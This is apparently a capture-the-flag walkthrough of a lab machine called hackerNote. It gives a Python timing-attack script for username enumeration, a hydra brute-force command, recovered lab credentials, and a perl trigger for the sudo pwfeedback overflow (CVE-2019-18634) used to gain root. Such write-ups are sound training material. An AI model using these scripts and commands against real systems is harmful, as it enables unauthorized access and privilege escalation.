# Enumeration
## NMAP SCAN
```nmap
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:a6:95:34:62:b0:56:2a:38:15:77:58:f4:f3:6c:ac (RSA)
|   256 6f:18:27:a4:e7:21:9d:4e:6d:55:b3:ac:c5:2d:d5:d3 (ECDSA)
|_  256 2d:c3:1b:58:4d:c3:5d:8e:6a:f6:37:9d:ca:ad:20:7c (ED25519)
80/tcp   open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home - hackerNote
8080/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home - hackerNote
|_http-open-proxy: Proxy might be redirecting requests
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Web (Port 80)
- No robots.txt
- We can create an account.
- We can login and create a note.
- If we try to login into an account that does not exist, it prompts `Invalid Username or Password`
- But if it's a valid account but wrong password, it prompts
  `Logging you in` for a second and vanishes.
- Possible user enumeration
# Exploit
## User enumeration using python
- Time is very inconsistent.
- But after watching the requests, valid account takes around 1 second to complete while other complete around 223ms.
- We can write our own script to do this.
```py
import requests
from time import time
URL = "http://10.10.41.239/api/user/login"
usernames = []
f = open('/usr/share/seclists/Usernames/Names/names.txt','r')
lines = f.readlines()
for line in lines:
	word = line.strip()
	creds = {"username":word,"password":"123"}
	start =time()
	r= requests.post(URL,json=creds)
	end = time()
	diff = end - start
	if diff > 0.9:
		usernames.append(word)
	else:
		continue
g=open('names.txt','a')
for user in usernames:
	g.write(user)
	g.write("\n")

g.close()
```
- We only found 1 user which is james.
## Brute forcing
- We have a password hint
`my favourite colour and my favourite number`
- We can create a custom wordlist.
- We can combine the wordlist using combinator.bin from hashcat-utils
```bash
/usr/share/hashcat-utils/combinator.bin colors.txt numbers.txt > wordlists.txt
```
- We can brute-force using hydra or if you want to use Burp that's fine too.
```bash
hydra -l james -P wordlist.txt 10.10.41.239 http-post-form "/api/user/login:username=^USER^&password=^PASS^:Invalid Username Or Password"
```
- After a while
```bash
[80][http-post-form] host: 10.10.41.239   login: james   password: blue7
```
- James left a note.
```txt
So that I don't forget, my SSH password is dak4ddb37b
```
- Possible credentials
`james:dak4ddb37b/blue7`
- We can SSH into the box.

# Privilege Escalation
- We are user james.
- Check `sudo -l`
```bash
Sorry, user james may not run sudo on hackernote
```
- Weird thing is that we see asterisks when typing a password.
- Searching around it's called pwfeedback
- CVE number is `CVE-2019-18634`
- Affecting versions prior to 1.8.26
- Our sudo version is `Sudo version 1.8.21p2`
- It is vulnerable to the [exploit](https://www.exploit-db.com/exploits/47995)
- The exploit does not require sudo permissions but just need pwfeedback to be enabled.
```bash
    $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
    Password: Segmentation fault
```
```bash
perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
[sudo] password for james: Segmentation fault (core dumped)
```
Okay so we do have buffer overflow
- I tried a few exploit but [saleemrashid's](https://github.com/saleemrashid/sudo-cve-2019-18634) seem to work the best
- Simply just run `make` with the Makefile in the same directory and it should generate an exploit.
- We are now root.






